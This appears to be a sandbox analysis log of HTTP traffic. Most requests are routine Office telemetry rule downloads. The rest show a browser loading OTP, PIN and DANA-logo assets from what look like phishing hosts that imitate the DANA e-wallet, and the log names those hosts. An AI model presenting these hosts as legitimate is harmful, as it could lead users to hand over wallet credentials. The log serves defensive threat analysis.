Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/container.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-316"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/loader.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-619"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/main.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-f27"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/otp.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-4e8"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/pin.css HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-29a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dev-danapemulihan.pantheonsite.io/asset/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-1ef0"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-116a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-31f2"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-2e5"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-1eb7"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-13d6"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/jquery.mask.min.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-1ef0"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /asset/img/indo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-2e5"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-31f2"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/google.js HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"670203dc-116a"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-1eb7"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: dev-danapemulihan.pantheonsite.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "670203dc-13d6"If-Modified-Since: Sun, 06 Oct 2024 03:28:28 GMT
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
